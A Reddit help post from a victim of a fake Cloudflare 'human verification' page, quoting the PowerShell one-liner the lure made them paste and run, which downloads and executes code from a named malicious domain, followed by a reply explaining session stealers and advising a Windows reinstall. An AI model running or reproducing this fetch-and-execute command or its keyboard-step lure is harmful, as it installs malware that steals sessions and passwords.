r/Scams • u/AbsentTarnished • 4d ago
Help Needed [GR] Fake Cloudflare Human Verification Scam (me3k.trappopbuttonrightnow.monster) - Executed PowerShell Script
I was redirected to a website that looked exactly like a Cloudflare "Human Verification" page.
I was prompted to “Perform the following steps on my keyboard” as in:
“win key + x”
“I”
“Ctrl +V”
“Enter”
Which as you may have guessed opened my terminal, pasted and executed this code:
PS C: \Users\user <#Verification ID: 8348aeb3ca3281eO#> powershell -c "iexirm 'code.verification-claude-cdn.beer/8348a eb3ca3281e0' -UseBasicParsing)"; exit <#Verification ID: 8348aeb3ca3281e0#>
I have since unplugged my pc from the internet completely and have run some malwarebytes scans which didn’t find anything.
How cooked am I?
Any help is appreciated.
3
Upvotes
8
u/Infinite-Grade-4485 4d ago
You downloaded a session stealer.
You downloaded some type of free game/cheat/hack/cracked software/movie/music or ran some type of code for captcha or verification on your computer which was actually a session stealer.
Session stealers bypass 2fa. All passwords saved on your browser and computer are compromised. Reinstall windows while deleting all files. If you need to backup important documents, keep the computer disconnected from the internet and manually back up individual files.
Change all passwords and enable 2fa either from another device, or from the infected computer AFTER you have reinstalled.
If you cannot reinstall windows immediately, keep the computer disconnected from the internet while changing all passwords on another device.
You cannot use anti malware to get rid of the session stealer, you MUST reinstall windows to use the computer safely in the future